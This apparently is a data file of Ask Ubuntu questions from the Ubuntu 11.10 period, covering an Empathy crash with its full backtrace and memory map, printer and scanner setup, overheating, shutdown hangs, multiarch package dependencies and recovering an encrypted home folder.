81010	empathy disappears every time i open it	i 'm using ubuntu 11.10 , gnome shell 3.2.1 and when ever i open empathy , empathy contact list disappears . when i try to open it via terminal , it still opens and disappears * glibc detected empathy : corrupted double-linked list : 0x087f2a88 ** ======= backtrace : ========= /lib/i386-linux-gnu/libc.so.6 ( +0x6ebc2 ) [ 0x7550bc2 ] /lib/i386-linux-gnu/libc.so.6 ( +0x6fa28 ) [ 0x7551a28 ] /lib/i386-linux-gnu/libc.so.6 ( cfree+0x6d ) [ 0x755494d ] /lib/i386-linux-gnu/libglib-2.0.so.0 ( +0x49c1b ) [ 0x2507c1b ] /lib/i386-linux-gnu/libglib-2.0.so.0 ( g_free+0x36 ) [ 0x2507ef6 ] /usr/lib/i386-linux-gnu/libpango-1.0.so.0 ( +0x1ca6b ) [ 0x315a6b ] /usr/lib/i386-linux-gnu/libpango-1.0.so.0 ( +0x1cb76 ) [ 0x315b76 ] /usr/lib/i386-linux-gnu/libgobject-2.0.so.0 ( g_object_unref+0x19a ) [ 0x47c68a ] /usr/lib/libgtk-3.so.0 ( +0xa2d6b ) [ 0x464cd6b ] /usr/lib/libgtk-3.so.0 ( gtk_cell_renderer_get_preferred_width+0x140 ) [ 0x4644630 ] /usr/lib/libgtk-3.so.0 ( gtk_cell_area_request_renderer+0x200 ) [ 0x463b190 ] /usr/lib/libgtk-3.so.0 ( +0x91de5 ) [ 0x463bde5 ] /usr/lib/libgtk-3.so.0 ( +0x93c26 ) [ 0x463dc26 ] /usr/lib/libgtk-3.so.0 ( gtk_cell_area_get_preferred_width+0xd2 ) [ 0x4637892 ] /usr/lib/libgtk-3.so.0 ( gtk_tree_view_column_cell_get_size+0xd5 ) [ 0x4844975 ] /usr/lib/libgtk-3.so.0 ( +0x27fa92 ) [ 0x4829a92 ] /usr/lib/libgtk-3.so.0 ( +0x28077b ) [ 0x482a77b ] /usr/lib/libgtk-3.so.0 ( +0x280bba ) [ 0x482abba ] /usr/lib/libgdk-3.so.0 ( +0x127fe ) [ 0x2647fe ] /lib/i386-linux-gnu/libglib-2.0.so.0 ( +0x3f110 ) [ 0x24fd110 ] /lib/i386-linux-gnu/libglib-2.0.so.0 ( g_main_context_dispatch+0x1df ) [ 0x250125f ] /lib/i386-linux-gnu/libglib-2.0.so.0 ( +0x43990 ) [ 0x2501990 ] /lib/i386-linux-gnu/libglib-2.0.so.0 ( g_main_loop_run+0x14b ) [ 0x2501f9b ] /usr/lib/libgtk-3.so.0 ( gtk_main+0xa5 ) [ 0x4701f95 ] /usr/lib/libgtk-3.so.0 ( +0x6bfe4 ) [ 0x4615fe4 ] /usr/lib/i386-linux-gnu/libgio-2.0.so.0 ( g_application_run+0x19c ) [ 0x7f0150c ] empathy ( main+0xa1 ) [ 0x8078171 ] /lib/i386-linux-gnu/libc.so.6 ( __libc_start_main+0xf3 ) [ 0x74fb113 ] empathy [ 0x80781b1 ] ======= memory map : ======== 00110000-00132000 r-xp 00000000 07:00 394831 /usr/lib/libfolks-telepathy.so.25.2.2 00132000-00133000 r -- p 00021000 07:00 394831 /usr/lib/libfolks-telepathy.so.25.2.2 00133000-00134000 rw-p 00022000 07:00 394831 /usr/lib/libfolks-telepathy.so.25.2.2 00134000-00215000 r-xp 00000000 07:00 394968 /usr/lib/libgstreamer-0.10.so.0.29.0 00215000-00218000 r -- p 000e0000 07:00 394968 /usr/lib/libgstreamer-0.10.so.0.29.0 00218000-00219000 rw-p 000e3000 07:00 394968 /usr/lib/libgstreamer-0.10.so.0.29.0 00219000-0021a000 rw-p 00000000 00:00 0 0021a000-0024a000 r-xp 00000000 07:00 395313 /usr/lib/libtelepathy-logger.so.2.2.0 0024a000-0024b000 r -- p 0002f000 07:00 395313 /usr/lib/libtelepathy-logger.so.2.2.0 0024b000-0024c000 rw-p 00030000 07:00 395313 /usr/lib/libtelepathy-logger.so.2.2.0 0024c000-00250000 r-xp 00000000 07:00 391996 /usr/lib/libcanberra-gtk3.so.0.1.8 00250000-00251000 r -- p 00003000 07:00 391996 /usr/lib/libcanberra-gtk3.so.0.1.8 00251000-00252000 rw-p 00004000 07:00 391996 /usr/lib/libcanberra-gtk3.so.0.1.8 00252000-002c8000 r-xp 00000000 07:00 394799 /usr/lib/libgdk-3.so.0.200.0 002c8000-002ca000 r -- p 00075000 07:00 394799 /usr/lib/libgdk-3.so.0.200.0 002ca000-002cb000 rw-p 00077000 07:00 394799 /usr/lib/libgdk-3.so.0.200.0 002cb000-002cf000 r-xp 00000000 07:00 397245 /usr/lib/i386-linux-gnu/libgthread-2.0.so.0.3000.0 002cf000-002d0000 r -- p 00003000 07:00 397245 /usr/lib/i386-linux-gnu/libgthread-2.0.so.0.3000.0 002d0000-002d1000 rw-p 00004000 07:00 397245 /usr/lib/i386-linux-gnu/libgthread-2.0.so.0.3000.0 002d1000-002d4000 r-xp 00000000 07:00 397231 /usr/lib/i386-linux-gnu/libgmodule-2.0.so.0.3000.0 002d4000-002d5000 r -- p 00002000 07:00 397231 /usr/lib/i386-linux-gnu/libgmodule-2.0.so.0.3000.0 002d5000-002d6000 rw-p 00003000 07:00 397231 /usr/lib/i386-linux-gnu/libgmodule-2.0.so.0.3000.0 002d8000-002d9000 r-xp 00000000 00:00 0 [ vdso ] 002d9000-002f7000 r-xp 00000000 07:00 397223 /usr/lib/i386-linux-gnu/libgdk_pixbuf-2.0.so.0.2400.0 002f7000-002f8000 r -- p 0001d000 07:00 397223 /usr/lib/i386-linux-gnu/libgdk_pixbuf-2.0.so.0.2400.0 002f8000-002f9000 rw-p 0001e000 07:00 397223 /usr/lib/i386-linux-gnu/libgdk_pixbuf-2.0.so.0.2400.0 002f9000-00340000 r-xp 00000000 07:00 397311 /usr/lib/i386-linux-gnu/libpango-1.0.so.0.2903.0 00340000-00341000 r -- p 00047000 07:00 397311 /usr/lib/i386-linux-gnu/libpango-1.0.so.0.2903.0 00341000-00342000 rw-p 00048000 07:00 397311 /usr/lib/i386-linux-gnu/libpango-1.0.so.0.2903.0 00342000-00359000 r-xp 00000000 07:00 784530 /lib/i386-linux-gnu/libpthread-2.13.so 00359000-0035a000 r -- p 00016000 07:00 784530 /lib/i386-linux-gnu/libpthread-2.13.so 0035a000-0035b000 rw-p 00017000 07:00 784530 /lib/i386-linux-gnu/libpthread-2.13.so 0035b000-0035d000 rw-p 00000000 00:00 0 0035d000-00389000 r-xp 00000000 07:00 392125 /usr/lib/libgconf-2.so.4.1.5 00389000-0038a000 r -- p 0002b000 07:00 392125 /usr/lib/libgconf-2.so.4.1.5 0038a000-0038b000 rw-p 0002c000 07:00 392125 /usr/lib/libgconf-2.so.4.1.5 0038d000-003bd000 r-xp 00000000 07:00 394851 /usr/lib/libnm-glib.so.4.2.0 003bd000-003be000 r -- p 00030000 07:00 394851 /usr/lib/libnm-glib.so.4.2.0 003be000-003bf000 rw-p 00031000 07:00 394851 /usr/lib/libnm-glib.so.4.2.0 003bf000-00419000 r-xp 00000000 07:00 395172 /usr/lib/libunity.so.6.2.0 00419000-0041b000 r -- p 00059000 07:00 395172 /usr/lib/libunity.so.6.2.0 0041b000-0041c000 rw-p 0005b000 07:00 395172 /usr/lib/libunity.so.6.2.0 0041c000-0046a000 r-xp 00000000 07:00 394871 /usr/lib/libgee.so.2.0.0 0046a000-0046c000 r -- p 0004d000 07:00 394871 /usr/lib/libgee.so.2.0.0 0046c000-0046d000 rw-p 0004f000 07:00 394871 /usr/lib/libgee.so.2.0.0 0046d000-004ba000 r-xp 00000000 07:00 397239 /usr/lib/i386-linux-gnu/libgobject-2.0.so.0.3000.0 004ba000-004bb000 r -- p 0004d000 07:00 397239 /usr/lib/i386-linux-gnu/libgobject-2.0.so.0.3000.0 004bb000-004bc000 rw-p 0004e000 07:00 397239 /usr/lib/i386-linux-gnu/libgobject-2.0.so.0.3000.0 004bc000-004cc000 r-xp 00000000 07:00 784543 /lib/i386-linux-gnu/libudev.so.0.12.0 004cc000-004cd000 r -- p 0000f000 07:00 784543 /lib/i386-linux-gnu/libudev.so.0.12.0 004cd000-004ce000 rw-p 00010000 07:00 784543 /lib/i386-linux-gnu/libudev.so.0.12.0 004ce000-004d5000 r-xp 00000000 07:00 784534 /lib/i386-linux-gnu/librt-2.13.so 004d5000-004d6000 r -- p 00006000 07:00 784534 /lib/i386-linux-gnu/librt-2.13.so 004d6000-004d7000 rw-p 00007000 07:00 784534 /lib/i386-linux-gnu/librt-2.13.so 004d7000-004da000 r-xp 00000000 07:00 784481 /lib/i386-linux-gnu/libdl-2.13.so 004da000-004db000 r -- p 00002000 07:00 784481 /lib/i386-linux-gnu/libdl-2.13.so 004db000-004dc000 rw-p 00003000 07:00 784481 /lib/i386-linux-gnu/libdl-2.13.so 004dc000-004dd000 r-xp 00000000 07:00 397720 /usr/lib/i386-linux-gnu/gdk-pixbuf-2.0/2.10.0/loaders/libpixbufloader-svg.so 004dd000-004de000 r -- p 00000000 07:00 397720 /usr/lib/i386-linux-gnu/gdk-pixbuf-2.0/2.10.0/loaders/libpixbufloader-svg.so 004de000-004df000 rw-p 00001000 07:00 397720 /usr/lib/i386-linux-gnu/gdk-pixbuf-2.0/2.10.0/loaders/libpixbufloader-svg.so 004df000-00521000 r-xp 00000000 07:00 394722 /usr/lib/libebook-1.2.so.12.3.1 00521000-00524000 r -- p 00042000 07:00 394722 /usr/lib/libebook-1.2.so.12.3.1 00524000-00525000 rw-p 00045000 07:00 394722 /usr/lib/libebook-1.2.so.12.3.1 00525000-00590000 r-xp 00000000 07:00 396166 /usr/lib/libcamel-1.2.so.29.0.0 00590000-00593000 r -- p 0006a000 07:00 396166 /usr/lib/libcamel-1.2.so.29.0.0 00593000-005a7000 rw-p 0006d000 07:00 396166 /usr/lib/libcamel-1.2.so.29.0.0 005a7000-005ea000 r-xp 00000000 07:00 392078 /usr/lib/libedataserver-1.2.so.15.0.0 005ea000-005eb000 -- -p 00043000 07:00 392078 /usr/lib/libedataserver-1.2.so.15.0.0 005eb000-005ec000 r -- p 00043000 07:00 392078 /usr/lib/libedataserver-1.2.so.15.0.0 005ec000-005ed000 rw-p 00044000 07:00 392078 /usr/lib/libedataserver-1.2.so.15.0.0 005ed000-005ef000 r-xp 00000000 07:00 397127 /usr/lib/i386-linux-gnu/libxinerama.so.1.0.0 005ef000-005f0000 r -- p 00001000 07:00 397127 /usr/lib/i386-linux-gnu/libxinerama.so.1.0.0 005f0000-005f1000 rw-p 00002000 07:00 397127 /usr/lib/i386-linux-gnu/libxinerama.so.1.0.0 005f1000-0060f000 r-xp 00000000 07:00 784457 /lib/i386-linux-gnu/ld-2.13.so 0060f000-00610000 r -- p 0001d000 07:00 784457 /lib/i386-linux-gnu/ld-2.13.so 00610000-00611000 rw-p 0001e000 07:00 784457 /lib/i386-linux-gnu/ld-2.13.so 00611000-007bf000 r-xp 00000000 07:00 395311 /usr/lib/libtelepathy-glib.so.0.61.0 007bf000-007c0000 -- -p 001ae000 07:00 395311 /usr/lib/libtelepathy-glib.so.0.61.0 007c0000-007c3000 r -- p 001ae000 07:00 395311 /usr/lib/libtelepathy-glib.so.0.61.0 007c3000-007c7000 rw-p 001b1000 07:00 395311 /usr/lib/libtelepathy-glib.so.0.61.0 007c7000-007c8000 rw-p 00000000 00:00 0 007c8000-0080f000 r-xp 00000000 07:00 784480 /lib/i386-linux-gnu/libdbus-1.so.3.5.7 0080f000-00810000 r -- p 00046000 07:00 784480 /lib/i386-linux-gnu/libdbus-1.so.3.5.7 00810000-00811000 rw-p 00047000 07:00 784480 /lib/i386-linux-gnu/libdbus-1.so.3.5.7 00812000-0081c000 r-xp 00000000 07:00 394811 /usr/lib/libenchant.so.1.6.0 0081c000-0081d000 r -- p 00009000 07:00 394811 /usr/lib/libenchant.so.1.6.0 0081d000-0081e000 rw-p 0000a000 07:00 394811 /usr/lib/libenchant.so.1.6.0 0081e000-00965000 r-xp 00000000 07:00 395414 /usr/lib/libxml2.so.2.7.8 00965000-00969000 r -- p 00147000 07:00 395414 /usr/lib/libxml2.so.2.7.8 00969000-0096a000 rw-p 0014b000 07:00 395414 /usr/lib/libxml2.so.2.7.8 0096a000-0096b000 rw-p 00000000 00:00 0 0096b000-00a9c000 r-xp 00000000 07:00 397107 /usr/lib/i386-linux-gnu/libx11.so.6.3.0 00a9c000-00a9d000 -- -p 00131000 07:00 397107 /usr/lib/i386-linux-gnu/libx11.so.6.3.0 00a9d000-00a9e000 r -- p 00131000 07:00 397107 /usr/lib/i386-linux-gnu/libx11.so.6.3.0 00a9e000-00aa0000 rw-p 00132000 07:00 397107 /usr/lib/i386-linux-gnu/libx11.so.6.3.0 00aa0000-00aa1000 rw-p 00000000 00:00 0 00aa1000-00ab4000 r-xp 00000000 07:00 784553 /lib/i386-linux-gnu/libz.so.1.2.3.4 00ab4000-00ab5000 r -- p 00012000 07:00 784553 /lib/i386-linux-gnu/libz.so.1.2.3.4 00ab5000-00ab6000 rw-p 00013000 07:00 784553 /lib/i386-linux-gnu/libz.so.1.2.3.4 00ab6000-00ad3000 r-xp 00000000 07:00 397405 /usr/lib/i386-linux-gnu/libxcb.so.1.1.0 00ad3000-00ad4000 r -- p 0001c000 07:00 397405 /usr/lib/i386-linux-gnu/libxcb.so.1.1.0 00ad4000-00ad5000 rw-p 0001d000 07:00 397405 /usr/lib/i386-linux-gnu/libxcb.so.1.1.0 00ad5000-00add000 r-xp 00000000 07:00 397395 /usr/lib/i386-linux-gnu/libvorbisfile.so.3.3.4 00add000-00ade000 r -- p 00007000 07:00 397395 /usr/lib/i386-linux-gnu/libvorbisfile.so.3.3.4 00ade000-00adf000 rw-p 00008000 07:00 397395 /usr/lib/i386-linux-gnu/libvorbisfile.so.3.3.4 00adf000-00ae7000 r-xp 00000000 07:00 395104 /usr/lib/libltdl.so.7.3.0 00ae7000-00ae8000 r -- p 00008000 07:00 395104 /usr/lib/libltdl.so.7.3.0 00ae8000-00ae9000 rw-p 00009000 07:00 395104 /usr/lib/libltdl.so.7.3.0 00ae9000-00aed000 r-xp 00000000 07:00 397121 /usr/lib/i386-linux-gnu/libxfixes.so.3.1.0 00aed000-00aee000 r -- p 00003000 07:00 397121 /usr/lib/i386-linux-gnu/libxfixes.so.3.1.0 00aee000-00aef000 rw-p 00004000 07:00 397121 /usr/lib/i386-linux-gnu/libxfixes.so.3.1.0 00af0000-00b42000 r-xp 00000000 07:00 394833 /usr/lib/libfolks.so.25.2.2 00b42000-00b44000 r -- p 00051000 07:00 394833 /usr/lib/libfolks.so.25.2.2 00b44000-00b45000 rw-p 00053000 07:00 394833 /usr/lib/libfolks.so.25.2.2 00b45000-00b94000 r-xp 00000000 07:00 394725 /usr/lib/libnm-util.so.2.1.0 00b94000-00b95000 -- -p 0004f000 07:00 394725 /usr/lib/libnm-util.so.2.1.0 00b95000-00b96000 r -- p 0004f000 07:00 394725 /usr/lib/libnm-util.so.2.1.0 00b96000-00b97000 rw-p 00050000 07:00 394725 /usr/lib/libnm-util.so.2.1.0 00b97000-00b98000 r-xp 00000000 07:00 397824 /usr/lib/i386-linux-gnu/pango/1.6.0/modules/pango-thai-lang.so 00b98000-00b99000 r -- p 00000000 07:00 397824 /usr/lib/i386-linux-gnu/pango/1.6.0/modules/pango-thai-lang.so 00b99000-00b9a000 rw-p 00001000 07:00 397824 /usr/lib/i386-linux-gnu/pango/1.6.0/modules/pango-thai-lang.so 00b9a000-00ba0000 r-xp 00000000 07:00 397292 /usr/lib/i386-linux-gnu/libnotify.so.4.0.0 00ba0000-00ba1000 r -- p 00005000 07:00 397292 /usr/lib/i386-linux-gnu/libnotify.so.4.0.0 00ba1000-00ba2000 rw-p 00006000 07:00 397292 /usr/lib/i386-linux-gnu/libnotify.so.4.0.0 00ba2000-00bb3000 r-xp 00000000 07:00 397378 /usr/lib/i386-linux-gnu/libtdb.so.1.2.9 00bb3000-00bb4000 r -- p 00010000 07:00 397378 /usr/lib/i386-linux-gnu/libtdb.so.1.2.9 00bb4000-00bb5000 rw-p 00011000 07:00 397378 /usr/lib/i386-linux-gnu/libtdb.so.1.2.9 00bb5000-00bbc000 r-xp 00000000 07:00 392133 /usr/lib/libgailutil-3.so.0.0.0 00bbc000-00bbd000 r -- p 00007000 07:00 392133 /usr/lib/libgailutil-3.so.0.0.0 00bbd000-00bbe000 rw-p 00008000 07:00 392133 /usr/lib/libgailutil-3.so.0.0.0 00bbe000-00bc9000 r-xp 00000000 07:00 394938 /usr/lib/libgstapp-0.10.so.0.24.0 00bc9000-00bca000 r -- p 0000a000 07:00 394938 /usr/lib/libgstapp-0.10.so.0.24.0 00bca000-00bcb000 rw-p 0000b000 07:00 394938 /usr/lib/libgstapp-0.10.so.0.24.0 00bcb000-00be9000 r-xp 00000000 07:00 394964 /usr/lib/libgstpbutils-0.10.so.0.24.0 00be9000-00bea000 r -- p 0001e000 07:00 394964 /usr/lib/libgstpbutils-0.10.so.0.24.0 00bea000-00beb000 rw-p 0001f000 07:00 394964 /usr/lib/libgstpbutils-0.10.so.0.24.0 00beb000-00bf6000 r-xp 00000000 07:00 394980 /usr/lib/libgstvideo-0.10.so.0.24.0 00bf6000-00bf7000 r -- p 0000a000 07:00 394980 /usr/lib/libgstvideo-0.10.so.0.24.0 00bf7000-00bf8000 rw-p 0000b000 07:00 394980 /usr/lib/libgstvideo-0.10.so.0.24.0 00bf8000-00bfd000 r-xp 00000000 07:00 397169 /usr/lib/i386-linux-gnu/libcairo-gobject.so.2.11000.2 00bfd000-00bfe000 r -- p 00005000 07:00 397169 /usr/lib/i386-linux-gnu/libcairo-gobject.so.2.11000.2 00bfe000-00bff000 rw-p 00006000 07:00 397169 /usr/lib/i386-linux-gnu/libcairo-gobject.so.2.11000.2 00c00000-00c20000 r-xp 00000000 07:00 394900 /usr/lib/libgnome-keyring.so.0.1.1 00c20000-00c21000 r -- p 0001f000 07:00 394900 /usr/lib/libgnome-keyring.so.0.1.1 00c21000-00c22000 rw-p 00020000 07:00 394900 /usr/lib/libgnome-keyring.so.0.1.1 00c22000-00c24000 r-xp 00000000 07:00 397111 /usr/lib/i386-linux-gnu/libxcomposite.so.1.0.0 00c24000-00c25000 r -- p 00001000 07:00 397111 /usr/lib/i386-linux-gnu/libxcomposite.so.1.0.0 00c25000-00c26000 rw-p 00002000 07:00 397111 /usr/lib/i386-linux-gnu/libxcomposite.so.1.0.0 00c28000-00c4b000 r-xp 00000000 07:00 397192 /usr/lib/i386-linux-gnu/libdbus-glib-1.so.2.2.0 00c4b000-00c4c000 r -- p 00022000 07:00 397192 /usr/lib/i386-linux-gnu/libdbus-glib-1.so.2.2.0 00c4c000-00c4d000 rw-p 00023000 07:00 397192 /usr/lib/i386-linux-gnu/libdbus-glib-1.so.2.2.0 00c4d000-00ccf000 r-xp 00000000 07:00 784493 /lib/i386-linux-gnu/libgcrypt.so.11.7.0 00ccf000-00cd0000 r -- p 00081000 07:00 784493 /lib/i386-linux-gnu/libgcrypt.so.11.7.0 00cd0000-00cd2000 rw-p 00082000 07:00 784493 /lib/i386-linux-gnu/libgcrypt.so.11.7.0 00cd2000-00cef000 r-xp 00000000 07:00 397145 /usr/lib/i386-linux-gnu/libatk-1.0.so.0.20209.1 00cef000-00cf1000 r -- p 0001c000 07:00 397145 /usr/lib/i386-linux-gnu/libatk-1.0.so.0.20209.1 00cf1000-00cf2000 rw-p 0001e000 07:00 397145 /usr/lib/i386-linux-gnu/libatk-1.0.so.0.20209.1 00cf2000-00cfd000 r-xp 00000000 07:00 397313 /usr/lib/i386-linux-gnu/libpangocairo-1.0.so.0.2903.0 00cfd000-00cfe000 r -- p 0000a000 07:00 397313 /usr/lib/i386-linux-gnu/libpangocairo-1.0.so.0.2903.0 00cfe000-00cff000 rw-p 0000b000 07:00 397313 /usr/lib/i386-linux-gnu/libpangocairo-1.0.so.0.2903.0 00cff000-00d08000 r-xp 00000000 07:00 397131 /usr/lib/i386-linux-gnu/libxrender.so.1.3.0 00d08000-00d09000 r -- p 00008000 07:00 397131 /usr/lib/i386-linux-gnu/libxrender.so.1.3.0 00d09000-00d0a000 rw-p 00009000 07:00 397131 /usr/lib/i386-linux-gnu/libxrender.so.1.3.0 00d0a000-00d0c000 r-xp 00000000 07:00 397115 /usr/lib/i386-linux-gnu/libxdamage.so.1.1.0 00d0c000-00d0d000 r -- p 00001000 07:00 397115 /usr/lib/i386-linux-gnu/libxdamage.so.1.1.0 00d0d000-00d0e000 rw-p 00002000 07:00 397115 /usr/lib/i386-linux-gnu/libxdamage.so.1.1.0 00d0e000-00d10000 r-xp 00000000 07:00 397403 /usr/lib/i386-linux-gnu/libxcb-shm.so.0.0.0 00d10000-00d11000 r -- p 00001000 07:00 397403 /usr/lib/i386-linux-gnu/libxcb-shm.so.0.0.0 00d11000-00d12000 rw-p 00002000 07:00 397403 /usr/lib/i386-linux-gnu/libxcb-shm.so.0.0.0 00d12000-00d21000 r-xp 00000000 07:00 394958 /usr/lib/libgstinterfaces-0.10.so.0.24.0 00d21000-00d22000 -- -p 0000f000 07:00 394958 /usr/lib/libgstinterfaces-0.10.so.0.24.0 00d22000-00d23000 r -- p 0000f000 07:00 394958 /usr/lib/libgstinterfaces-0.10.so.0.24.0 00d23000-00d24000 rw-p 00010000 07:00 394958 /usr/lib/libgstinterfaces-0.10.so.0.24.0 00d24000-00d35000 r-xp 00000000 07:00 397119 /usr/lib/i386-linux-gnu/libxext.so.6.4.0 00d35000-00d36000 r -- p 00010000 07:00 397119 /usr/lib/i386-linux-gnu/libxext.so.6.4.0 00d36000-00d37000 rw-p 00011000 07:00 397119 /usr/lib/i386-linux-gnu/libxext.so.6.4.0 00d37000-00d3a000 r-xp 00000000 07:00 784497 /lib/i386-linux-gnu/libgpg-error.so.0.8.0 00d3a000-00d3b000 r -- p 00002000 07:00 784497 /lib/i386-linux-gnu/libgpg-error.so.0.8.0 00d3b000-00d3c000 rw-p 00003000 07:00 784497 /lib/i386-linux-gnu/libgpg-error.so.0.8.0 00d3c000-00d4b000 r-xp 00000000 07:00 395060 /usr/lib/libido3-0.1.so.0.0.0 00d4b000-00d4c000 r -- p 0000e000 07:00 395060 /usr/lib/libido3-0.1.so.0.0.0 00d4c000-00d4d000 rw-p 0000f000 07:00 395060 /usr/lib/libido3-0.1.so.0.0.0 00d4d000-00d6f000 r-xp 00000000 07:00 397262 /usr/lib/i386-linux-gnu/libjpeg.so.62.0.0 00d6f000-00d70000 r -- p 00022000 07:00 397262 /usr/lib/i386-linux-gnu/libjpeg.so.62.0.0 00d70000-00d71000 rw-p 00023000 07:00 397262 /usr/lib/i386-linux-gnu/libjpeg.so.62.0.0 00d71000-00d78000 r-xp 00000000 07:00 397129 /usr/lib/i386-linux-gnu/libxrandr.so.2.2.0 00d78000-00d79000 r -- p 00006000 07:00 397129 /usr/lib/i386-linux-gnu/libxrandr.so.2.2.0aborted
81017	samsung ml1250 stopped working	printer stopped working ( samsung ml1250 ) ! i dont know what to do with them ! i tried to reinstall ubuntu 11.10 but printer does n't work ! printer fully work on windows xp ! please help me ) )
81018	why do mouse buttons sometimes exchange ?	since the update from 10.10 to 11.10 , my mouse-buttons sometimes exchange . happens for example once waking up from suspend-to-ram . now when clicking a link with the left button itâll open a popup-menu , so i have to use the right mouse button instead . it does n't matter if using the internal laptop-buttons or an external usb mouse . any thoughts on why this happens and how to get rid of it ?
81019	toshiba laptop overheats and switches off	since upgrading to 11.10 from 11.04 my laptop rapidly heats up and eventually turns off by itself ( due to the intense heat i presume ) . this was not happening whilst running 11.04 ; i opted then to run gnome rather then unity , not sure if this makes a differences . was hoping to solve this problem as it worries me that this continues to happen . if anyone can help me , or i need to provide more information on my system please provide step by step instructions on how to do this as i am still a beginner to the linux platform .
81020	computer wo n't shutdown because of power management	i am using ubuntu 11.10 and when i run `` sudo shutdown 0 '' , the computer does n't shutdown . it gets stuck on `` disabling power management '' . any idea of what 's happening ? thanks in advance . also , this seems to happen more when using battery instead of ac .
81021	how do i install oscommerce ?	recently i 've come across the oscommerce , an open-source e-commerce project , and i 'd like to try it . is it packaged in the repository ( like wordpress ) ? if not , how do i manually install and use it ?
81027	konversations runs akonadi migration on every startup	every time i start konversation , i get this screen : it takes some 15 seconds âś how can i prevent it from coming up ? i mean migrating once should be it .
81029	is there a way to install i386 packages w/ it 's i386 dependencies ?	i 'm using ubuntu 11.10 64-bit and i wish to install the cad application draftsight , which as of now only come in a 32-bit .deb file . i have installed this with some success before , but since 11.10 supports multiarch i would like to install the i386 versions of draftsights dependencies . ubuntu software center can not handle the file , nor gdebi-gtk ( 'wrong architecture ' ) . i can use dpkg with -- force-architecture -- force depends but there 's a lot of dependencies which i need to manually install afterward . is there a way to automatically install these ? or semi-automatically with a script of some sort ? ( i 'm thinking something along the lines of extracting the dependencies and adding : i386 and then feed that to apt-get or something ... ) below is the output of dpkg-deb -- info of the package in question . package : dassault-systemes-draftsight version : 2011.7.1198 section : applications priority : extra architecture : i386 pre-depends : libexpat1 ( > =2.0.1-4 ) , libglib2.0-0 ( > =2.22.3-0 ) , libpcre3 ( > =7.8-3 ) , libselinux1 ( > =2.0.85-2 ) , zlib1g ( > =1:1.2.3.3.dfsg-13 ) , libc6 ( > =2.10.1-0 ) , libx11-6 ( > =2:1.2.2-1 ) , libxau6 ( > =1:1.0.4-2 ) , libxcomposite1 ( > =1:0.4.0-4 ) , libxcursor1 ( > =1:1.1.9-1build1 ) , libxdamage1 ( > =1:1.1.1-4 ) , libxdmcp6 ( > =1:1.0.2-3 ) , libxext6 ( > =2:1.0.99.1-0 ) , libxfixes3 ( > =1:4.0.3-2build1 ) , libxi6 ( > =2:1.2.1-2 ) , libxinerama1 ( > =2:1.0.3-2 ) , libxrandr2 ( > =2:1.3.0-2 ) , libxrender1 ( > =1:0.9.4-2 ) , libatk1.0-0 ( > =1.28.0-0 ) , libcairo2 ( > =1.8.8-2 ) , libdirectfb-extra ( > =1.2.7-2 ) , libfontconfig1 ( > =2.6.0-1 ) , libfreetype6 ( > =2.3.9-5 ) , libgtk2.0-0 ( > =2.18.3-1 ) , libpango1.0-0 ( > =1.26.0-1 ) , libpixman-1-0 ( > =0.14.0-1 ) , libpng12-0 ( > =1.2.37-1 ) , libxcb-render-util0 ( > =0.3.6-1 ) , libxcb-render0 ( > =1.4-1 ) , libxcb1 ( > =1.4-1 ) , debconf ( > = 1.1 ) | debconf-2.0 depends : libcomerr2 ( > =1.41.9-1 ) , libdbus-1-3 ( > =1.2.16-0 ) , libexpat1 ( > =2.0.1-4 ) , libgcc1 ( > =1:4.4.1-4 ) , libgcrypt11 ( > =1.4.4-2 ) , libglib2.0-0 ( > =2.22.3-0 ) , libgpg-error0 ( > =1.6-1 ) , libkeyutils1 ( > =1.2-10 ) , libpcre3 ( > =7.8-3 ) , libuuid1 ( > =2.16-1 ) , zlib1g ( > =1:1.2.3.3.dfsg-13 ) , libc6 ( > =2.10.1-0 ) , libgl1-mesa-glx ( > =7.6.0-1 ) , libglu1-mesa ( > =7.6.0-1 ) , libice6 ( > =2:1.0.5-1 ) , libsm6 ( > =2:1.1.0-2 ) , libx11-6 ( > =2:1.2.2-1 ) , libxau6 ( > =1:1.0.4-2 ) , libxdamage1 ( > =1:1.1.1-4 ) , libxdmcp6 ( > =1:1.0.2-3 ) , libxext6 ( > =2:1.0.99.1-0 ) , libxfixes3 ( > =1:4.0.3-2build1 ) , libxrender1 ( > =1:0.9.4-2 ) , libxt6 ( > =1:1.0.5-3 ) , libxxf86vm1 ( > =1:1.0.2-1 ) , libaudio2 ( > =1.9.2-1 ) , libavahi-client3 ( > =0.6.25-1 ) , libavahi-common3 ( > =0.6.25-1 ) , libcups2 ( > =1.4.1-5 ) , libdrm2 ( > =2.4.14-1 ) , libfontconfig1 ( > =2.6.0-1 ) , libgnutls26 ( > =2.8.3-2 ) , libgssapi-krb5-2 ( > =1.7dfsg~beta3-1 ) , libk5crypto3 ( > =1.7dfsg~beta3-1 ) , libkrb5-3 ( > =1.7dfsg~beta3-1 ) , libkrb5support0 ( > =1.7dfsg~beta3-1 ) , libstdc++6 ( > =4.4.1-4 ) , libtasn1-3 ( > =2.2-1 ) , libxcb1 ( > =1.4-1 ) , sendmail installed-size : 284948 maintainer : dassault systemes < crashreports @ draftsight.com > homepage : www.3ds.com description : with draftsight , you can easily create professional cad drawings . supported file formats are dwt , dxf and dwg .
81035	how do i get the brother dcp-135c scanner to work ?	i have a brother dcp-135c printer/scanner connected to my ubuntu 11.10 amd64 machine . i have managed to get the printer working , but it does n't recognise the scanner . i have installed the drivers from the brother website , brscan2 , etc. , but it still does n't work . how can i get the scanner working ?
81036	is it possible to do an apt-get installation and continue it later ?	let 's say i want to install something big ... ( kde for example ) but i 'm doing it in a place with a very poor internet conection , so i want to stop it , and doing it later . but i do n't want to start all over again . can it be done ?
81040	need help desperately to decrypt home folder	okay , long story : my windows crashed so i installed 11.10 on my hdd . i then partitioned my 1tb so i could dual boot both oses . but now when i go to log into my ubuntu system it says `` missing operating system '' . i went to recover all of my data from that machine using ext2explore on my windows machine to find that they are all encrypted ! i have booted with a livecd and done the mounting and all the steps to access the encrypted files from there but each time i go to chroot it tells me a /bash/bin format error . i really need help on how to get my data out of the encryption either with fixing my ubuntu os or something . if you need more clarification on something please let me know , i 'm just a little stressed on losing everything i have because i encrypted it and ca n't get it back .
81042	is system cleanup/optimization needed	does ubuntu need regular cleanups like windows . for example : cleaning the logs temporary files package cache dependencies left over i am not referring to web browsers only . in case i never do a cleanup , will i have a system like new without my hard drive being full of temporary files , packages , etc. ? will the performance degrade overtime if a cleanup is not done .
